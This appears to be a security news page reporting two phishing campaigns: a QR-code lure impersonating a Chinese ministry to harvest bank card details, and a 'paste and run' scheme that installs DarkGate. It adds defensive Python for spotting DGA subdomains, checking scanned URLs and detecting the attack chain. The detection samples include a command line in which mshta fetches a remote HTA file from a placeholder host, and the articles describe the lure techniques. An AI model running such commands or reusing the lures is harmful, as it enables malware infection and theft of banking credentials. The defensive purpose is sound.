
Chinese Citizens Targeted in QR Code-Based Phishing Campaign


Researchers from Cyble Research and Intelligence Labs (CRIL) have discovered a QR code-based phishing campaign that uses malicious Word documents masquerading as official documents from the Ministry of Human Resources and Social Security of China. Users are tricked into providing bank card details and passwords under the guise of identity verification and authentication processes.

QR Code-Based Phishing Campaign

QR code phishing attacks have escalated significantly this year, with cybercriminals leveraging this technology to steal personal and financial information. Threat actors (TAs) are embedding QR codes in office documents and redirecting users to fraudulent websites designed to harvest sensitive data. This tactic has seen a marked rise in 2024, continuing a trend that started during the COVID-19 pandemic, when QR codes became widely adopted for contactless transactions and information sharing. The Hoxhunt Challenge highlighted a 22% increase in QR code phishing during late 2023, and research by Abnormal Security indicates that 89.3% of these attacks aim to steal credentials. Growing familiarity with QR codes has created a false sense of security that makes them easier for cybercriminals to exploit: a QR code masks its destination URL, so users cannot easily verify the legitimacy of the site they are being redirected to.

Recent QR Code Campaigns and Techniques

Recently, Cyble Research and Intelligence Labs uncovered a sophisticated phishing campaign targeting individuals in China. The campaign uses Microsoft Word documents embedded with QR codes, distributed as spam email attachments. The documents are designed to appear as official notices from the Ministry of Human Resources and Social Security of China, offering labor subsidies above 1000 RMB to lure victims.

Figure: MS Word file containing QR code (Source: Cyble)

The documents are meticulously crafted to look authentic, complete with official logos and language that mimics government communications. Once the QR code in the document is scanned, it redirects the user to a phishing site designed to collect sensitive information.

This particular campaign stands out for its use of a Domain Generation Algorithm (DGA), which generates a series of seemingly random domain names. A DGA is a program that generates large numbers of new domain names. Cybercriminals and botnet operators generally use it to frequently change the domains used to launch malware attacks, which lets them evade malware-detection solutions that block specific domain names and static IP addresses.

The latest campaign isn't an isolated incident. A similar phishing operation was documented in January 2023 by Fortinet, in which cybercriminals impersonated another Chinese government agency. This resurgence in QR code phishing attacks indicates a persistent threat targeting Chinese citizens, with malicious actors continually refining their tactics to evade detection.

The QR Code Phishing Process

The phishing process begins with the user scanning the QR code from the malicious Word document. This takes them to the phishing site, which initially displays a dialogue box promising a labor subsidy. The site is designed to appear official, complete with government logos and formal language to enhance credibility.

The phishing site instructs the user to provide personal information, starting with their name and national ID. This step is presented as a necessary part of the application process for the subsidy. Once the user enters this information, they are directed to a second page that requests detailed bank card information, including the card number, phone number, and balance. This information is ostensibly required for identity verification and to process the subsidy.

After collecting the bank card details, the phishing site asks the user to wait while their information is "verified." This waiting period is a tactic used to add a sense of legitimacy to the process. Following this, the site prompts the user to enter their bank card password, under the guise of further verification. This password is suspected to be the same as the payment password used for domestic credit card transactions. By obtaining this password along with the card details, the threat actors can perform unauthorized transactions, leading to significant financial losses for the victim.

Phishing Activity Technical IoCs

The phishing activity begins when the user scans the QR code embedded in the Word document. This action directs them to the link “hxxp://wj[.]zhvsp[.]com”. This initial URL then redirects to a subdomain under “tiozl[.]cn”, created using a DGA. The use of a DGA means the phishing URLs are constantly changing, making them harder to block preemptively.

Figure: Landing page of phishing site (Source: Cyble)

The domain “tiozl[.]cn” is hosted on the IP address “20.2.161[.]134”. This IP address is associated with multiple other domains, suggesting a large-scale phishing operation. The domains linked to this campaign are:

- 2wxlrl.tiozl[.]cn
- op18bw[.]tiozl.cn
- gzha31.tiozl[.]cn
- i5xydb[.]tiozl.cn
- hzrz7c.zcyyl[.]com

Further investigation revealed that the SHA-256 fingerprint of an SSH server host key associated with the IP address “20.2.161[.]134” is linked to 18 other IPs, all within the same Autonomous System Number (ASN), AS8075, and located in Hong Kong. These IPs host URLs with similar patterns, indicating a coordinated effort to deploy numerous phishing sites.

The rise in QR code phishing attacks underscores the increasing sophistication and adaptability of cybercriminals. By exploiting the widespread use of QR codes, especially in a post-pandemic world, these attacks effectively lure users into divulging sensitive financial information. The recent campaign targeting Chinese citizens highlights the severity of this threat, as malicious actors use seemingly official documents to gather card details and passwords, leading to significant financial losses. This trend emphasizes the need for heightened vigilance and robust security measures to protect against such evolving threats.
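To show how DGA-style subdomains like the ones listed above can be surfaced from a SOC's own telemetry, here is an added example (not Cyble's code) that scores the leftmost DNS label of each hostname in a web-proxy log by length, Shannon entropy and vowel share, and then counts how many generated-looking labels sit under one parent domain. The log lines, log format and thresholds are constructed for this example; the hostnames are the ones named in the article, refanged.

```python
"""Lexical triage of subdomains seen in web-proxy logs.

Heuristic: generated labels such as the tiozl[.]cn subdomains above tend to
be medium-length, high-entropy and nearly vowel-free. This is a triage
signal, not proof of a DGA, and it will produce false positives on some CDN
or tracking hostnames; tune the thresholds against your own DNS baseline.
"""
import math
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed proxy log lines: "<timestamp> <client-ip> <url>". The hostnames
# are the ones listed in the article (refanged) plus two benign ones.
SAMPLE_LOG = """\
2024-06-06T10:01:02Z 10.0.0.5 http://wj.zhvsp.com/
2024-06-06T10:01:04Z 10.0.0.5 http://2wxlrl.tiozl.cn/index
2024-06-06T10:01:09Z 10.0.0.7 https://www.wikipedia.org/
2024-06-06T10:02:11Z 10.0.0.5 http://op18bw.tiozl.cn/verify
2024-06-06T10:02:30Z 10.0.0.9 https://mail.google.com/
2024-06-06T10:03:01Z 10.0.0.5 http://hzrz7c.zcyyl.com/
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+)$")
VOWELS = set("aeiou")


def shannon_entropy(text):
    """Bits of entropy per character of the string."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def label_features(label):
    """Length, entropy, digit share and vowel share (among letters) of one DNS label."""
    letters = [c for c in label if c.isalpha()]
    digits = sum(c.isdigit() for c in label)
    vowels = sum(c in VOWELS for c in letters)
    return {
        "length": len(label),
        "entropy": shannon_entropy(label),
        "digit_ratio": digits / len(label) if label else 0.0,
        "vowel_ratio": vowels / len(letters) if letters else 0.0,
    }


def looks_generated(label, min_len=5, min_entropy=2.0, max_vowel_ratio=0.3):
    """True when a label is long enough, varied enough and nearly vowel-free."""
    f = label_features(label)
    return (f["length"] >= min_len
            and f["entropy"] >= min_entropy
            and f["vowel_ratio"] < max_vowel_ratio)


def parse_log(text):
    """Yield (timestamp, client, hostname) for each well-formed log line."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ts, client, url = m.groups()
            yield ts, client, (urlsplit(url).hostname or "").lower()


def flag_hosts(text):
    """Hosts with at least three labels whose leftmost label looks generated."""
    flagged = []
    for ts, client, host in parse_log(text):
        labels = host.split(".")
        if len(labels) >= 3 and looks_generated(labels[0]):
            flagged.append((ts, client, host))
    return flagged


def generated_per_parent(text):
    """Count generated-looking subdomains per parent domain; several under one
    parent is a stronger DGA signal than a single odd hostname."""
    counts = Counter()
    for _, _, host in flag_hosts(text):
        counts[".".join(host.split(".")[1:])] += 1
    return counts


if __name__ == "__main__":
    for ts, client, host in flag_hosts(SAMPLE_LOG):
        print(ts, client, host, label_features(host.split(".")[0]))
    print(dict(generated_per_parent(SAMPLE_LOG)))
```

Running the block prints the three flagged hostnames with their feature values and the per-parent count (`tiozl.cn` twice, `zcyyl.com` once); `wj.zhvsp.com` is not flagged because its leftmost label is too short to score, which is a reminder that lexical scoring complements, rather than replaces, block lists built from published IoCs.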

Recommendations for Mitigation

To mitigate the risk of QR code phishing attacks, CRIL said it is crucial to follow these cybersecurity best practices:

1. Scan QR codes from trusted sources only: Avoid scanning codes from unsolicited emails, messages, or documents, especially those offering financial incentives or urgent actions.
2. Verify URLs before proceeding: After scanning a QR code, carefully check the URL for legitimacy, such as official domains and secure connections (https://).
3. Install reputable antivirus and anti-phishing software: These tools can detect and block malicious websites and downloads.
4. Stay informed about phishing techniques: Educate yourself and others about the risks associated with QR codes to prevent successful phishing attacks.
5. Use two-factor authentication (2FA): This adds an extra layer of security, making it harder for attackers to gain unauthorized access.
6. Keep software up to date: Ensure your operating systems, browsers, and applications are updated with the latest security patches to protect against known vulnerabilities.
7. Use secure QR code scanner apps: Consider apps that check URLs against a database of known malicious sites before opening them.
8. Monitor financial statements regularly: Review your bank and credit card statements for unauthorized transactions and report any suspicious activity immediately.
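As an added example of recommendations 2 and 7 (this is not part of CRIL's advisory), the following function triages a URL decoded from a QR code before it is opened. `ministry.example` is a placeholder standing in for the genuine agency domain; the block-list hosts are the ones named in the article. The check goes a little beyond the text by also catching lookalike subdomains, user-info tricks and punycode hosts, the cases where an "official-looking" URL is most likely to fool a visual inspection.

```python
"""Triage a URL decoded from a QR code before it is opened.

Checks, in order: the URL has a host, uses https, is not on the campaign
block list, is not a punycode/IDN host, and sits under an allowlisted
official domain. Domain matching is done on whole labels so that
"ministry.example.evil.example" is not treated as the ministry's site.
"""
from urllib.parse import urlsplit

# Placeholder for the genuine agency domain; "ministry.example" is constructed
# for this example and must be replaced with the real official domain.
OFFICIAL_DOMAINS = {"ministry.example"}

# Hosts named in the article's indicators of compromise
KNOWN_BAD_HOSTS = {"wj.zhvsp.com", "tiozl.cn", "zcyyl.com"}


def host_matches(host, domains):
    """Exact match or a subdomain of one of `domains` (label-aligned, not substring)."""
    return any(host == d or host.endswith("." + d) for d in domains)


def check_scanned_url(url):
    """Return (verdict, reason); verdict is 'allow', 'block' or 'review'."""
    parts = urlsplit(url.strip())
    # hostname drops any user:pass@ prefix, so "https://ministry.example@evil.example/"
    # yields "evil.example", the host the browser would actually contact
    host = (parts.hostname or "").lower()
    if not host:
        return "block", "no host in URL"
    if parts.scheme != "https":
        return "block", "connection is not https"
    if host_matches(host, KNOWN_BAD_HOSTS):
        return "block", "host is on the block list"
    if not host.isascii() or any(label.startswith("xn--") for label in host.split(".")):
        return "review", "internationalized host name; check the spelling carefully"
    if host_matches(host, OFFICIAL_DOMAINS):
        return "allow", "host is under an official domain"
    return "review", "unknown host; do not enter personal or card details"


if __name__ == "__main__":
    for candidate in (
        "https://subsidy.ministry.example/apply",
        "http://2wxlrl.tiozl.cn/",
        "https://ministry.example.evil.example/",
        "https://ministry.example@evil.example/",
    ):
        print(candidate, "->", check_scanned_url(candidate))
```

The order of the checks matters: the block list is consulted before the allowlist so that a known-bad host can never be rescued by a lookalike label, and unknown hosts land in "review" rather than "allow" because a scanner app cannot know every legitimate site.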

Researchers Warn About Phishing Emails That Trick Users Into Pasting Malicious Commands

By: Alan J
6 June 2024 at 16:12


Security researchers have uncovered a new phishing campaign that attempts to trick recipients into pasting (CTRL+V) and executing malicious commands on their system. It leverages a sophisticated attack chain along with what the researchers have dubbed the "paste and run" technique.

'Paste and Run' Phishing Technique

The attackers behind the campaign send emails to potential victims purporting to be from legitimate businesses or organizations. Researchers from AhnLab stated that these emails often involve topics such as fee processing or operational instructions to entice recipients into opening attached files. The emails carry an attachment whose purpose is disguised, as in the examples below.

Figure: Phishing Ctrl+V email (Source: asec.ahnlab.com)

Once the victim clicks on the HTML attachment, a fake message displays in the browser, disguised as a Microsoft Word document. This message directs the user to click a "How to fix" button that purports to help them load the document offline. After clicking the button, a set of instructions prompts the user to type a sequence of keyboard commands: first [Win+R], then [Ctrl+V], and then [Enter].

Figure: Phishing instructions (Source: asec.ahnlab.com)

The button may alternatively load a different set of instructions directing the user to open the Windows PowerShell terminal manually and right-click within the terminal window. By following either set of instructions, the victim inadvertently pastes a malicious script into the terminal, which then executes on their system.

Phishing Scheme Installs DarkGate Malware

The PowerShell script downloaded and executed by the scheme is a component of the DarkGate malware family. Once the script runs, it downloads and executes an HTA (HTML Application) file from a remote command-and-control server. The HTA file then executes additional instructions to launch AutoIt3.exe, passing a malicious AutoIt script (script.a3x) as an argument. The script appears to load the DarkGate malware to infect the system while also clearing the user's clipboard to conceal the execution of the malicious commands.

"The overall operation flow from the reception of the email to the infection is quite complex, making it difficult for users to detect and prevent," the researchers noted.

Figure: Email Phishing Ctrl+V (Source: asec.ahnlab.com)
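To make the chain concrete from the defender's side, here is an added example (not AhnLab's code) of detection logic run over constructed process-creation events in the style of Sysmon event 1. It flags each stage described above (explorer.exe starting PowerShell with an encoded command, PowerShell starting mshta.exe with a remote .hta, mshta.exe starting AutoIt3.exe with a .a3x script) and decodes the Base64/UTF-16LE script behind -EncodedCommand so an analyst can read it. The sample script, the file paths and the c2.example host are placeholders; script.a3x is the file name given in the article.

```python
"""Detection logic for the paste-and-run chain, over constructed events.

Stages: explorer.exe (the Win+R Run box) starting PowerShell with an encoded
command, PowerShell starting mshta.exe with a remote .hta, and mshta.exe
starting AutoIt3.exe with a .a3x script. -EncodedCommand carries Base64 of
the script in UTF-16LE, which decode_encoded_command() reverses.
"""
import base64
import re

# Harmless stand-in for the pasted script; the real campaign's script is not reproduced here
SAMPLE_SCRIPT = "Write-Output 'constructed sample, not the real payload'"
ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")

# Constructed events. c2.example is a placeholder host; script.a3x is the name from the article.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -w hidden -enc {ENCODED}"},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://c2.example/stage.hta"},
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Users\victim\AppData\Local\Temp\AutoIt3.exe",
     "CommandLine": r"AutoIt3.exe C:\Users\victim\AppData\Local\Temp\script.a3x"},
    # Benign: an admin running a script file, and a plain notepad launch
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

# Covers the common spellings -e, -ec, -enc and -EncodedCommand
ENCODED_ARG_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
REMOTE_HTA_RE = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)
A3X_RE = re.compile(r"\.a3x\b", re.IGNORECASE)

CHAIN_STAGES = ("encoded-powershell-from-explorer", "mshta-remote-hta", "autoit-script-execution")


def decode_encoded_command(cmdline):
    """Decoded script when the command line carries an encoded-command switch, else None."""
    m = ENCODED_ARG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def image_name(path):
    """Lower-cased file name of an image path, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(ev):
    """Names of chain stages matched by one process-creation event."""
    parent, image, cmd = image_name(ev["ParentImage"]), image_name(ev["Image"]), ev["CommandLine"]
    hits = []
    if image == "powershell.exe" and parent == "explorer.exe" and decode_encoded_command(cmd) is not None:
        hits.append(CHAIN_STAGES[0])
    if image == "mshta.exe" and REMOTE_HTA_RE.search(cmd):
        hits.append(CHAIN_STAGES[1])
    if image == "autoit3.exe" and A3X_RE.search(cmd):
        hits.append(CHAIN_STAGES[2])
    return hits


def chain_complete(events):
    """True when every stage of the chain appears somewhere in the events."""
    seen = {stage for ev in events for stage in classify_event(ev)}
    return all(stage in seen for stage in CHAIN_STAGES)


if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        print(i, image_name(ev["Image"]), classify_event(ev))
    print("decoded:", decode_encoded_command(SAMPLE_EVENTS[0]["CommandLine"]))
    print("full chain seen:", chain_complete(SAMPLE_EVENTS))
```

The stages are scored independently on purpose: in the variant where the victim is told to open a PowerShell window and right-click into it, the pasted script runs inside a console the user started, so there is no explorer.exe-to-powershell.exe event with an encoded command, and the mshta.exe and AutoIt3.exe stages are the only process-creation evidence left.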

Protecting Against the Phishing Campaign

The researchers advised email recipients to remain cautious when handling unsolicited emails, even if they appear to come from legitimate sources, to avoid falling victim to the phishing campaign. Recipients should refrain from opening attachments or clicking links until they can verify the sender and the content of the email. "Users must take extra caution when handling files from unknown sources, especially the URLs and attachments of emails," the researchers emphasized.

Recipients should also be wary of any message that prompts them to execute commands, as this is a common tactic used by attackers to compromise systems. Upon receiving such a request, it is recommended to either ignore the email or report it to your organization's IT security team.

The researchers also shared indicators of compromise (IOCs) associated with the campaign, including Base64-encoded PowerShell commands, HTA files and AutoIt scripts, download URLs, file signatures and behavioral indicators.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.